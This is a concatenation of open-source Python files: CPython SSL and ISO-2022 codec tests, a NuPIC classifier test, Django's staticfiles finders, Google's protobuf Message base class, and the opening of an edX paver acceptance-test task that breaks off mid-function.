        try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
                           server_options=ssl.OP_NO_SSLv3)
        # Will choose TLSv1
        try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
                           server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
        try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
                           server_options=ssl.OP_NO_TLSv1)
    @skip_if_broken_ubuntu_ssl
    def test_protocol_sslv3(self):
        """Connecting to an SSLv3 server with various client options"""
        if support.verbose:
            sys.stdout.write("\n")
        try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True)
        try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True, ssl.CERT_OPTIONAL)
        try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True, ssl.CERT_REQUIRED)
        if hasattr(ssl, 'PROTOCOL_SSLv2'):
            try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
        try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False)
        try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
        if no_sslv2_implies_sslv3_hello():
            # No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
            try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, True,
                               client_options=ssl.OP_NO_SSLv2)
    @skip_if_broken_ubuntu_ssl
    def test_protocol_tlsv1(self):
        """Connecting to a TLSv1 server with various client options"""
        if support.verbose:
            sys.stdout.write("\n")
        try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True)
        try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True, ssl.CERT_OPTIONAL)
        try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True, ssl.CERT_REQUIRED)
        if hasattr(ssl, 'PROTOCOL_SSLv2'):
            try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
        try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
        try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False)
    def test_starttls(self):
        """Switching from clear text to encrypted and back again."""
        msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
        server = ThreadedEchoServer(CERTFILE,
                                    ssl_version=ssl.PROTOCOL_TLSv1,
                                    starttls_server=True,
                                    chatty=True,
                                    connectionchatty=True)
        flag = threading.Event()
        server.start(flag)
        # wait for it to start
        flag.wait()
        # try to connect
        wrapped = False
        try:
            s = socket.socket()
            s.setblocking(1)
            s.connect((HOST, server.port))
            if support.verbose:
                sys.stdout.write("\n")
            # `wrapped` tracks which transport is live: the TLS-wrapped
            # `conn` after STARTTLS, or the plain socket `s` otherwise.
            for indata in msgs:
                if support.verbose:
                    sys.stdout.write(
                        " client: sending %r...\n" % indata)
                if wrapped:
                    conn.write(indata)
                    outdata = conn.read()
                else:
                    s.send(indata)
                    outdata = s.recv(1024)
                msg = outdata.strip().lower()
                if indata == b"STARTTLS" and msg.startswith(b"ok"):
                    # STARTTLS ok, switch to secure mode
                    if support.verbose:
                        sys.stdout.write(
                            " client: read %r from server, starting TLS...\n"
                            % msg)
                    conn = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
                    wrapped = True
                elif indata == b"ENDTLS" and msg.startswith(b"ok"):
                    # ENDTLS ok, switch back to clear text
                    if support.verbose:
                        sys.stdout.write(
                            " client: read %r from server, ending TLS...\n"
                            % msg)
                    s = conn.unwrap()
                    wrapped = False
                else:
                    if support.verbose:
                        sys.stdout.write(
                            " client: read %r from server\n" % msg)
            if support.verbose:
                sys.stdout.write(" client: closing connection.\n")
            if wrapped:
                conn.write(b"over\n")
            else:
                s.send(b"over\n")
            if wrapped:
                conn.close()
            else:
                s.close()
        finally:
            server.stop()
            server.join()
    def test_socketserver(self):
        """Using a SocketServer to create and manage SSL connections."""
        server = make_https_server(self, CERTFILE)
        # try to connect
        if support.verbose:
            sys.stdout.write('\n')
        with open(CERTFILE, 'rb') as f:
            d1 = f.read()
        d2 = ''
        # now fetch the same data from the HTTPS server
        url = 'https://%s:%d/%s' % (
            HOST, server.port, os.path.split(CERTFILE)[1])
        f = urllib.request.urlopen(url)
        try:
            dlen = f.info().get("content-length")
            if dlen and (int(dlen) > 0):
                d2 = f.read(int(dlen))
                if support.verbose:
                    sys.stdout.write(
                        " client: read %d bytes from remote server '%s'\n"
                        % (len(d2), server))
        finally:
            f.close()
        # NOTE(review): d2 stays the empty str if no content-length was
        # sent; the comparison below then fails on type, not content.
        self.assertEqual(d1, d2)
    def test_asyncore_server(self):
        """Check the example asyncore integration."""
        indata = "TEST MESSAGE of mixed case\n"
        if support.verbose:
            sys.stdout.write("\n")
        indata = b"FOO\n"
        # NOTE(review): the str assignment above is dead code -- it is
        # immediately overwritten by the bytes payload actually used.
        server = AsyncoreEchoServer(CERTFILE)
        flag = threading.Event()
        server.start(flag)
        # wait for it to start
        flag.wait()
        # try to connect
        try:
            s = ssl.wrap_socket(socket.socket())
            s.connect(('127.0.0.1', server.port))
            if support.verbose:
                sys.stdout.write(
                    " client: sending %r...\n" % indata)
            s.write(indata)
            outdata = s.read()
            if support.verbose:
                sys.stdout.write(" client: read %r\n" % outdata)
            if outdata != indata.lower():
                self.fail(
                    "bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
                    % (outdata[:20], len(outdata),
                       indata[:20].lower(), len(indata)))
            s.write(b"over\n")
            if support.verbose:
                sys.stdout.write(" client: closing connection.\n")
            s.close()
            if support.verbose:
                sys.stdout.write(" client: connection closed.\n")
        finally:
            if support.verbose:
                sys.stdout.write(" cleanup: stopping server.\n")
            server.stop()
            if support.verbose:
                sys.stdout.write(" cleanup: joining server thread.\n")
            server.join()
            if support.verbose:
                sys.stdout.write(" cleanup: successfully joined.\n")
    def test_recv_send(self):
        """Test recv(), send() and friends."""
        if support.verbose:
            sys.stdout.write("\n")
        server = ThreadedEchoServer(CERTFILE,
                                    certreqs=ssl.CERT_NONE,
                                    ssl_version=ssl.PROTOCOL_TLSv1,
                                    cacerts=CERTFILE,
                                    chatty=True,
                                    connectionchatty=False)
        flag = threading.Event()
        server.start(flag)
        # wait for it to start
        flag.wait()
        # try to connect
        s = ssl.wrap_socket(socket.socket(),
                            server_side=False,
                            certfile=CERTFILE,
                            ca_certs=CERTFILE,
                            cert_reqs=ssl.CERT_NONE,
                            ssl_version=ssl.PROTOCOL_TLSv1)
        s.connect((HOST, server.port))
        try:
            # helper methods for standardising recv* method signatures
            def _recv_into():
                b = bytearray(b"\0"*100)
                count = s.recv_into(b)
                return b[:count]
            def _recvfrom_into():
                b = bytearray(b"\0"*100)
                count, addr = s.recvfrom_into(b)
                return b[:count]
            # (name, method, whether to expect success, *args)
            # Datagram-style methods must fail on an SSL socket with a
            # ValueError whose message starts with the method name.
            send_methods = [
                ('send', s.send, True, []),
                ('sendto', s.sendto, False, ["some.address"]),
                ('sendall', s.sendall, True, []),
            ]
            recv_methods = [
                ('recv', s.recv, True, []),
                ('recvfrom', s.recvfrom, False, ["some.address"]),
                ('recv_into', _recv_into, True, []),
                ('recvfrom_into', _recvfrom_into, False, []),
            ]
            data_prefix = "PREFIX_"
            for meth_name, send_meth, expect_success, args in send_methods:
                indata = (data_prefix + meth_name).encode('ascii')
                try:
                    send_meth(indata, *args)
                    outdata = s.read()
                    if outdata != indata.lower():
                        self.fail(
                            "While sending with <<{name:s}>> bad data "
                            "<<{outdata:r}>> ({nout:d}) received; "
                            "expected <<{indata:r}>> ({nin:d})\n".format(
                                name=meth_name, outdata=outdata[:20],
                                nout=len(outdata),
                                indata=indata[:20], nin=len(indata)
                            )
                        )
                except ValueError as e:
                    if expect_success:
                        self.fail(
                            "Failed to send with method <<{name:s}>>; "
                            "expected to succeed.\n".format(name=meth_name)
                        )
                    if not str(e).startswith(meth_name):
                        self.fail(
                            "Method <<{name:s}>> failed with unexpected "
                            "exception message: {exp:s}\n".format(
                                name=meth_name, exp=e
                            )
                        )
            for meth_name, recv_meth, expect_success, args in recv_methods:
                indata = (data_prefix + meth_name).encode('ascii')
                try:
                    s.send(indata)
                    outdata = recv_meth(*args)
                    if outdata != indata.lower():
                        self.fail(
                            "While receiving with <<{name:s}>> bad data "
                            "<<{outdata:r}>> ({nout:d}) received; "
                            "expected <<{indata:r}>> ({nin:d})\n".format(
                                name=meth_name, outdata=outdata[:20],
                                nout=len(outdata),
                                indata=indata[:20], nin=len(indata)
                            )
                        )
                except ValueError as e:
                    if expect_success:
                        self.fail(
                            "Failed to receive with method <<{name:s}>>; "
                            "expected to succeed.\n".format(name=meth_name)
                        )
                    if not str(e).startswith(meth_name):
                        self.fail(
                            "Method <<{name:s}>> failed with unexpected "
                            "exception message: {exp:s}\n".format(
                                name=meth_name, exp=e
                            )
                        )
                    # consume data
                    s.read()
            s.write(b"over\n")
            s.close()
        finally:
            server.stop()
            server.join()
    def test_handshake_timeout(self):
        # Issue #5103: SSL handshake must respect the socket timeout
        server = socket.socket(socket.AF_INET)
        host = "127.0.0.1"
        port = support.bind_port(server)
        started = threading.Event()
        finish = False
        def serve():
            # Accept connections but never speak TLS, so the client's
            # handshake is guaranteed to hit its timeout.
            server.listen(5)
            started.set()
            conns = []
            while not finish:
                r, w, e = select.select([server], [], [], 0.1)
                if server in r:
                    # Let the socket hang around rather than having
                    # it closed by garbage collection.
                    conns.append(server.accept()[0])
            for sock in conns:
                sock.close()
        t = threading.Thread(target=serve)
        t.start()
        started.wait()
        try:
            try:
                c = socket.socket(socket.AF_INET)
                c.settimeout(0.2)
                c.connect((host, port))
                # Will attempt handshake and time out
                self.assertRaisesRegex(socket.timeout, "timed out",
                                       ssl.wrap_socket, c)
            finally:
                c.close()
            try:
                c = socket.socket(socket.AF_INET)
                c = ssl.wrap_socket(c)
                c.settimeout(0.2)
                # Will attempt handshake and time out
                self.assertRaisesRegex(socket.timeout, "timed out",
                                       c.connect, (host, port))
            finally:
                c.close()
        finally:
            finish = True
            t.join()
            server.close()
def test_main(verbose=False):
    """Report the environment, verify certificate fixtures, run the suites."""
    if support.verbose:
        # Build a human-readable platform description for the log header.
        probes = {
            'Linux': platform.linux_distribution,
            'Mac': platform.mac_ver,
            'Windows': platform.win32_ver,
        }
        plat = None
        for label, probe in probes.items():
            info = probe()
            if info and info[0]:
                plat = '%s %r' % (label, info)
                break
        if plat is None:
            plat = repr(platform.platform())
        print("test_ssl: testing with %r %r" %
              (ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
        print(" under %s" % plat)
        print(" HAS_SNI = %r" % ssl.HAS_SNI)
    # Every certificate fixture must be present before anything runs.
    missing = [fn for fn in (CERTFILE, SVN_PYTHON_ORG_ROOT_CERT, BYTES_CERTFILE,
                             ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
                             BADCERT, BADKEY, EMPTYCERT)
               if not os.path.exists(fn)]
    if missing:
        raise support.TestFailed("Can't read certificate file %r" % missing[0])
    # The threaded suite additionally needs threads and the network resource.
    tests = [ContextTests, BasicSocketTests]
    if support.is_resource_enabled('network'):
        tests.append(NetworkedTests)
    if _have_threads:
        thread_info = support.threading_setup()
        if thread_info and support.is_resource_enabled('network'):
            tests.append(ThreadedTests)
    try:
        support.run_unittest(*tests)
    finally:
        if _have_threads:
            support.threading_cleanup(*thread_info)
# Allow running this test file directly.
if __name__ == "__main__":
    test_main()
| apache-2.0 |
sunlianqiang/kbengine | kbe/res/scripts/common/Lib/test/test_codecencodings_iso2022.py | 88 | 1464 | # Codec encoding tests for ISO 2022 encodings.
from test import support
from test import multibytecodec_support
import unittest
# Decode cases shared by all ISO-2022 codecs below:
# (input bytes, error handler, expected decoded text).
COMMON_CODEC_TESTS = (
    # invalid bytes
    (b'ab\xFFcd', 'replace', 'ab\uFFFDcd'),
    (b'ab\x1Bdef', 'replace', 'ab\x1Bdef'),
    (b'ab\x1B$def', 'replace', 'ab\uFFFD'),
)
class Test_ISO2022_JP(multibytecodec_support.TestBase, unittest.TestCase):
    # iso2022_jp passes an unknown "ESC N" sequence through unchanged.
    encoding = 'iso2022_jp'
    tstring = multibytecodec_support.load_teststring('iso2022_jp')
    codectests = COMMON_CODEC_TESTS + (
        (b'ab\x1BNdef', 'replace', 'ab\x1BNdef'),
    )
class Test_ISO2022_JP2(multibytecodec_support.TestBase, unittest.TestCase):
    # Unlike plain iso2022_jp, iso2022_jp_2 consumes the "ESC N" bytes:
    # the expected output here is 'abdef', not 'ab\x1BNdef'.
    encoding = 'iso2022_jp_2'
    tstring = multibytecodec_support.load_teststring('iso2022_jp')
    codectests = COMMON_CODEC_TESTS + (
        (b'ab\x1BNdef', 'replace', 'abdef'),
    )
class Test_ISO2022_KR(multibytecodec_support.TestBase, unittest.TestCase):
    encoding = 'iso2022_kr'
    tstring = multibytecodec_support.load_teststring('iso2022_kr')
    codectests = COMMON_CODEC_TESTS + (
        (b'ab\x1BNdef', 'replace', 'ab\x1BNdef'),
    )
    # iso2022_kr.txt cannot be used to test "chunk coding": the escape
    # sequence is only written on the first line
    @unittest.skip('iso2022_kr.txt cannot be used to test "chunk coding"')
    def test_chunkcoding(self):
        # Intentionally disabled; see the skip reason above.
        pass
def test_main():
    # Discover and run every TestCase defined in this module.
    support.run_unittest(__name__)
# Allow running this test file directly.
if __name__ == "__main__":
    test_main()
| lgpl-3.0 |
BoltzmannBrain/nupic | tests/unit/nupic/algorithms/fast_cla_classifier_test.py | 35 | 1606 | #!/usr/bin/env python
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""Unit tests for the FastCLAClassifier.
This test extends the test for the Python CLAClassifier to ensure that both
classifiers and their tests stay in sync.
"""
import unittest2 as unittest
from nupic.bindings.algorithms import FastCLAClassifier
# Don't import the CLAClassifierTest directly or the unittest.main() will pick
# it up and run it.
import cla_classifier_test
class FastCLAClassifierTest(cla_classifier_test.CLAClassifierTest):
    """Unit tests for FastCLAClassifier class."""
    # Re-runs the inherited CLAClassifierTest suite against the
    # C++-backed FastCLAClassifier, keeping both implementations in sync.
    def setUp(self):
        # The parent test cases instantiate whatever class is stored here.
        self._classifier = FastCLAClassifier
# Allow running this test file directly.
if __name__ == '__main__':
    unittest.main()
| agpl-3.0 |
tigersirvine/occtigerscricket | django/contrib/staticfiles/finders.py | 83 | 9624 | import os
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.files.storage import default_storage, Storage, FileSystemStorage
from django.utils.datastructures import SortedDict
from django.utils.functional import empty, memoize, LazyObject
from django.utils.importlib import import_module
from django.utils._os import safe_join
from django.contrib.staticfiles import utils
from django.contrib.staticfiles.storage import AppStaticStorage
_finders = SortedDict()
class BaseFinder(object):
    """
    A base file finder to be used for custom staticfiles finder classes.
    """
    # Subclasses must override both find() and list().
    def find(self, path, all=False):
        """
        Given a relative file path this ought to find an
        absolute file path.
        If the ``all`` parameter is ``False`` (default) only
        the first found file path will be returned; if set
        to ``True`` a list of all found files paths is returned.
        """
        raise NotImplementedError()
    def list(self, ignore_patterns):
        """
        Given an optional list of paths to ignore, this should return
        a two item iterable consisting of the relative path and storage
        instance.
        """
        raise NotImplementedError()
class FileSystemFinder(BaseFinder):
    """
    A static files finder that uses the ``STATICFILES_DIRS`` setting
    to locate files.
    """
    def __init__(self, apps=None, *args, **kwargs):
        # List of locations with static files
        self.locations = []
        # Maps dir paths to an appropriate storage instance
        self.storages = SortedDict()
        if not isinstance(settings.STATICFILES_DIRS, (list, tuple)):
            raise ImproperlyConfigured(
                "Your STATICFILES_DIRS setting is not a tuple or list; "
                "perhaps you forgot a trailing comma?")
        for root in settings.STATICFILES_DIRS:
            # Each entry is either a plain path or a (prefix, path) pair.
            if isinstance(root, (list, tuple)):
                prefix, root = root
            else:
                prefix = ''
            if os.path.abspath(settings.STATIC_ROOT) == os.path.abspath(root):
                raise ImproperlyConfigured(
                    "The STATICFILES_DIRS setting should "
                    "not contain the STATIC_ROOT setting")
            if (prefix, root) not in self.locations:
                self.locations.append((prefix, root))
        for prefix, root in self.locations:
            filesystem_storage = FileSystemStorage(location=root)
            filesystem_storage.prefix = prefix
            self.storages[root] = filesystem_storage
        super(FileSystemFinder, self).__init__(*args, **kwargs)
    def find(self, path, all=False):
        """
        Looks for files in the extra locations
        as defined in ``STATICFILES_DIRS``.
        """
        matches = []
        for prefix, root in self.locations:
            matched_path = self.find_location(root, path, prefix)
            if matched_path:
                if not all:
                    return matched_path
                matches.append(matched_path)
        return matches
    def find_location(self, root, path, prefix=None):
        """
        Finds a requested static file in a location, returning the found
        absolute path (or ``None`` if no match).
        """
        if prefix:
            # Strip the location's URL prefix; a path outside this
            # prefix cannot match this location.
            prefix = '%s%s' % (prefix, os.sep)
            if not path.startswith(prefix):
                return None
            path = path[len(prefix):]
        path = safe_join(root, path)
        if os.path.exists(path):
            return path
    def list(self, ignore_patterns):
        """
        List all files in all locations.
        """
        for prefix, root in self.locations:
            storage = self.storages[root]
            for path in utils.get_files(storage, ignore_patterns):
                yield path, storage
class AppDirectoriesFinder(BaseFinder):
    """
    A static files finder that looks in the directory of each app as
    specified in the source_dir attribute of the given storage class.
    """
    storage_class = AppStaticStorage
    def __init__(self, apps=None, *args, **kwargs):
        # The list of apps that are handled
        self.apps = []
        # Mapping of app module paths to storage instances
        self.storages = SortedDict()
        if apps is None:
            apps = settings.INSTALLED_APPS
        for app in apps:
            app_storage = self.storage_class(app)
            # Only track apps whose static directory actually exists.
            if os.path.isdir(app_storage.location):
                self.storages[app] = app_storage
                if app not in self.apps:
                    self.apps.append(app)
        super(AppDirectoriesFinder, self).__init__(*args, **kwargs)
    def list(self, ignore_patterns):
        """
        List all files in all app storages.
        """
        for storage in self.storages.itervalues():
            if storage.exists(''): # check if storage location exists
                for path in utils.get_files(storage, ignore_patterns):
                    yield path, storage
    def find(self, path, all=False):
        """
        Looks for files in the app directories.
        """
        matches = []
        for app in self.apps:
            match = self.find_in_app(app, path)
            if match:
                if not all:
                    return match
                matches.append(match)
        return matches
    def find_in_app(self, app, path):
        """
        Find a requested static file in an app's static locations.

        Returns the absolute path, or None when the app has no storage,
        the prefix does not match, or the file does not exist.
        """
        storage = self.storages.get(app, None)
        if storage:
            if storage.prefix:
                prefix = '%s%s' % (storage.prefix, os.sep)
                if not path.startswith(prefix):
                    return None
                path = path[len(prefix):]
            # only try to find a file if the source dir actually exists
            if storage.exists(path):
                matched_path = storage.path(path)
                if matched_path:
                    return matched_path
class BaseStorageFinder(BaseFinder):
    """
    A base static files finder to be used to extended
    with an own storage class.
    """
    # Subclasses set this to a Storage class or instance.
    storage = None
    def __init__(self, storage=None, *args, **kwargs):
        if storage is not None:
            self.storage = storage
        if self.storage is None:
            raise ImproperlyConfigured("The staticfiles storage finder %r "
                                       "doesn't have a storage class "
                                       "assigned." % self.__class__)
        # Make sure we have an storage instance here.
        if not isinstance(self.storage, (Storage, LazyObject)):
            self.storage = self.storage()
        super(BaseStorageFinder, self).__init__(*args, **kwargs)
    def find(self, path, all=False):
        """
        Looks for files in the default file storage, if it's local.
        """
        try:
            self.storage.path('')
        except NotImplementedError:
            # Non-local storage exposes no filesystem paths to search.
            pass
        else:
            if self.storage.exists(path):
                match = self.storage.path(path)
                if all:
                    match = [match]
                return match
        return []
    def list(self, ignore_patterns):
        """
        List all files of the storage.
        """
        for path in utils.get_files(self.storage, ignore_patterns):
            yield path, self.storage
class DefaultStorageFinder(BaseStorageFinder):
    """
    A static files finder that uses the default storage backend.
    """
    storage = default_storage
    def __init__(self, *args, **kwargs):
        super(DefaultStorageFinder, self).__init__(*args, **kwargs)
        # Reject storages without a usable base location up front.
        base_location = getattr(self.storage, 'base_location', empty)
        if not base_location:
            raise ImproperlyConfigured("The storage backend of the "
                                       "staticfiles finder %r doesn't have "
                                       "a valid location." % self.__class__)
def find(path, all=False):
    """
    Find a static file with the given path using all enabled finders.

    If ``all`` is ``False`` (default), return the first matching
    absolute path (or ``None`` if no match). Otherwise return a list
    of all matching absolute paths (empty when nothing matches).
    """
    matches = []
    for finder in get_finders():
        result = finder.find(path, all=all)
        if not all and result:
            return result
        if not isinstance(result, (list, tuple)):
            result = [result]
        matches.extend(result)
    if matches:
        return matches
    # No match. The original ``return all and [] or None`` always
    # returned None, because [] is falsy in the and/or idiom -- so
    # callers asking for all matches got None instead of the empty
    # list promised by the docstring.
    if all:
        return []
    return None
def get_finders():
    # Yield one finder instance per entry in STATICFILES_FINDERS
    # (instances are cached by the memoized get_finder below).
    for finder_path in settings.STATICFILES_FINDERS:
        yield get_finder(finder_path)
def _get_finder(import_path):
    """
    Imports the staticfiles finder class described by import_path, where
    import_path is the full Python path to the class.

    Raises ImproperlyConfigured when the module cannot be imported, the
    attribute does not exist, or the class is not a BaseFinder subclass.
    """
    module, attr = import_path.rsplit('.', 1)
    try:
        mod = import_module(module)
    # NOTE(review): Python 2-only ``except X, e`` syntax; left as-is to keep
    # compatibility with the old Python versions this file targets.
    except ImportError, e:
        raise ImproperlyConfigured('Error importing module %s: "%s"' %
                                   (module, e))
    try:
        Finder = getattr(mod, attr)
    except AttributeError:
        raise ImproperlyConfigured('Module "%s" does not define a "%s" '
                                   'class.' % (module, attr))
    if not issubclass(Finder, BaseFinder):
        raise ImproperlyConfigured('Finder "%s" is not a subclass of "%s"' %
                                   (Finder, BaseFinder))
    return Finder()
get_finder = memoize(_get_finder, _finders, 1)
| bsd-3-clause |
gauribhoite/personfinder | env/google_appengine/google/net/proto2/python/public/message.py | 7 | 8376 | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Contains an abstract base class for protocol messages."""
# Base exception for all errors raised by this module.
class Error(Exception): pass
# Raised when deserializing wire data into a message fails.
class DecodeError(Error): pass
# Raised when serializing a message fails (see SerializeToString).
class EncodeError(Error): pass
class Message(object):
  """Abstract base class for protocol messages.

  Protocol message classes are almost always generated by the protocol
  compiler.  These generated types subclass Message and implement the methods
  shown below.

  TODO: Link to an HTML document here.

  TODO: Document that instances of this class will also
  have an Extensions attribute with __getitem__ and __setitem__.
  Again, not sure how to best convey this.

  TODO: Document that the class must also have a static
  RegisterExtension(extension_field) method.
  Not sure how to best express at this point.
  """
  # Empty __slots__: the abstract base itself declares no instance
  # attributes, leaving storage decisions to concrete subclasses.
  __slots__ = []
  # Presumably overridden by generated subclasses with their message
  # descriptor -- TODO confirm against the code generator.
  DESCRIPTOR = None
  def __deepcopy__(self, memo=None):
    # Deep copy by building a fresh instance and merging self into it;
    # MergeFrom performs the recursive copy.
    clone = type(self)()
    clone.MergeFrom(self)
    return clone
  def __eq__(self, other_msg):
    """Recursively compares two messages by value and structure."""
    raise NotImplementedError
  def __ne__(self, other_msg):
    # Defined in terms of __eq__ so subclasses only override one of the pair.
    return not self == other_msg
  def __hash__(self):
    # Messages are mutable, hence explicitly unhashable.
    raise TypeError('unhashable object')
  def __str__(self):
    """Outputs a human-readable representation of the message."""
    raise NotImplementedError
  def __unicode__(self):
    """Outputs a human-readable representation of the message."""
    raise NotImplementedError
  def MergeFrom(self, other_msg):
    """Merges the contents of the specified message into current message.

    This method merges the contents of the specified message into the current
    message. Singular fields that are set in the specified message overwrite
    the corresponding fields in the current message. Repeated fields are
    appended. Singular sub-messages and groups are recursively merged.

    Args:
      other_msg: Message to merge into the current message.
    """
    raise NotImplementedError
  def CopyFrom(self, other_msg):
    """Copies the content of the specified message into the current message.

    The method clears the current message and then merges the specified
    message using MergeFrom.

    Args:
      other_msg: Message to copy into the current one.
    """
    # Copying onto oneself would otherwise Clear() and lose the data.
    if self is other_msg:
      return
    self.Clear()
    self.MergeFrom(other_msg)
  def Clear(self):
    """Clears all data that was set in the message."""
    raise NotImplementedError
  def SetInParent(self):
    """Mark this as present in the parent.

    This normally happens automatically when you assign a field of a
    sub-message, but sometimes you want to make the sub-message
    present while keeping it empty.  If you find yourself using this,
    you may want to reconsider your design."""
    raise NotImplementedError
  def IsInitialized(self):
    """Checks if the message is initialized.

    Returns:
      The method returns True if the message is initialized (i.e. all of its
      required fields are set).
    """
    raise NotImplementedError
  def MergeFromString(self, serialized):
    """Merges serialized protocol buffer data into this message.

    When we find a field in |serialized| that is already present
    in this message:
      - If it's a "repeated" field, we append to the end of our list.
      - Else, if it's a scalar, we overwrite our field.
      - Else, (it's a nonrepeated composite), we recursively merge
        into the existing composite.

    TODO: Document handling of unknown fields.

    Args:
      serialized: Any object that allows us to call buffer(serialized)
        to access a string of bytes using the buffer interface.

    TODO: When we switch to a helper, this will return None.

    Returns:
      The number of bytes read from |serialized|.
      For non-group messages, this will always be len(serialized),
      but for messages which are actually groups, this will
      generally be less than len(serialized), since we must
      stop when we reach an END_GROUP tag.  Note that if
      we *do* stop because of an END_GROUP tag, the number
      of bytes returned does not include the bytes
      for the END_GROUP tag information.
    """
    raise NotImplementedError
  def ParseFromString(self, serialized):
    """Parse serialized protocol buffer data into this message.

    Like MergeFromString(), except we clear the object first and
    do not return the value that MergeFromString returns.
    """
    self.Clear()
    self.MergeFromString(serialized)
  def SerializeToString(self):
    """Serializes the protocol message to a binary string.

    Returns:
      A binary string representation of the message if all of the required
      fields in the message are set (i.e. the message is initialized).

    Raises:
      message.EncodeError if the message isn't initialized.
    """
    raise NotImplementedError
  def SerializePartialToString(self):
    """Serializes the protocol message to a binary string.

    This method is similar to SerializeToString but doesn't check if the
    message is initialized.

    Returns:
      A string representation of the partial message.
    """
    raise NotImplementedError
  def ListFields(self):
    """Returns a list of (FieldDescriptor, value) tuples for all
    fields in the message which are not empty.  A singular field is non-empty
    if HasField() would return true, and a repeated field is non-empty if
    it contains at least one element.  The fields are ordered by field
    number"""
    raise NotImplementedError
  def HasField(self, field_name):
    """Checks if a certain field is set for the message, or if any field inside
    a oneof group is set.  Note that if the field_name is not defined in the
    message descriptor, ValueError will be raised."""
    raise NotImplementedError
  def ClearField(self, field_name):
    """Clears the contents of a given field, or the field set inside a oneof
    group.  If the name neither refers to a defined field or oneof group,
    ValueError is raised."""
    raise NotImplementedError
  def WhichOneof(self, oneof_group):
    """Returns the name of the field that is set inside a oneof group, or
    None if no field is set.  If no group with the given name exists, ValueError
    will be raised."""
    raise NotImplementedError
  def HasExtension(self, extension_handle):
    raise NotImplementedError
  def ClearExtension(self, extension_handle):
    raise NotImplementedError
  def ByteSize(self):
    """Returns the serialized size of this message.

    Recursively calls ByteSize() on all contained messages.
    """
    raise NotImplementedError
  def _SetListener(self, message_listener):
    """Internal method used by the protocol message implementation.
    Clients should not call this directly.

    Sets a listener that this message will call on certain state transitions.

    The purpose of this method is to register back-edges from children to
    parents at runtime, for the purpose of setting "has" bits and
    byte-size-dirty bits in the parent and ancestor objects whenever a child or
    descendant object is modified.

    If the client wants to disconnect this Message from the object tree, she
    explicitly sets callback to None.

    If message_listener is None, unregisters any existing listener.  Otherwise,
    message_listener must implement the MessageListener interface in
    internal/message_listener.py, and we discard any listener registered
    via a previous _SetListener() call.
    """
    raise NotImplementedError
  def __getstate__(self):
    """Support the pickle protocol."""
    # Pickle the wire form rather than Python attributes; partial
    # serialization is used so uninitialized messages still pickle.
    return dict(serialized=self.SerializePartialToString())
  def __setstate__(self, state):
    """Support the pickle protocol."""
    self.__init__()
    self.ParseFromString(state['serialized'])
| apache-2.0 |
atsolakid/edx-platform | pavelib/acceptance_test.py | 54 | 1985 | """
Acceptance test tasks
"""
from paver.easy import task, cmdopts, needs
from pavelib.utils.test.suites import AcceptanceTestSuite
from optparse import make_option
try:
from pygments.console import colorize
except ImportError:
colorize = lambda color, text: text # pylint: disable=invalid-name
__test__ = False # do not collect
@task
@needs(
    'pavelib.prereqs.install_prereqs',
    'pavelib.utils.test.utils.clean_reports_dir',
)
@cmdopts([
    ("system=", "s", "System to act on"),
    ("default_store=", "m", "Default modulestore to use for course creation"),
    ("fasttest", "a", "Run without collectstatic"),
    ("extra_args=", "e", "adds as extra args to the test command"),
    make_option("--verbose", action="store_const", const=2, dest="verbosity"),
    make_option("-q", "--quiet", action="store_const", const=0, dest="verbosity"),
    make_option("-v", "--verbosity", action="count", dest="verbosity"),
    make_option("--pdb", action="store_true", help="Launches an interactive debugger upon error"),
])
def test_acceptance(options):
    """
    Run the acceptance tests for either the lms or cms.
    """
    # Collect the recognized options off the paver options object, falling
    # back to each option's default when it was not supplied.
